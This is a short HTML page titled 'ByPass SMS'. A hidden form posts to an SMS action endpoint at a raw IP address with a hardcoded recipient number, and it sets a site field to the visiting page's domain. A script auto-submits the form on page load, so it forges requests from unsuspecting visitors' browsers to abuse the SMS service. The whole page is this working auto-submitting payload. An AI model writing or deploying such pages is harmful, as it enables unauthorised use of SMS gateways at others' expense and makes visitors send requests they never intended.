<html>
<head>
<title>ByPass SMS</title>
<meta http-equiv='Content-Type' content='text/html; charset=utf-8'>
</head>
<body>
<form name="smsbypassfrm" method="post" action="http://218.234.23.179/smsAction.do">
<input type="hidden" name="to" value="01192423108">
<input type="hidden" name="site" value="">
</form>
</body>
</html>
<script type='text/javascript'>
document.smsbypassfrm.site.value = document.domain;
document.smsbypassfrm.submit();
</script>
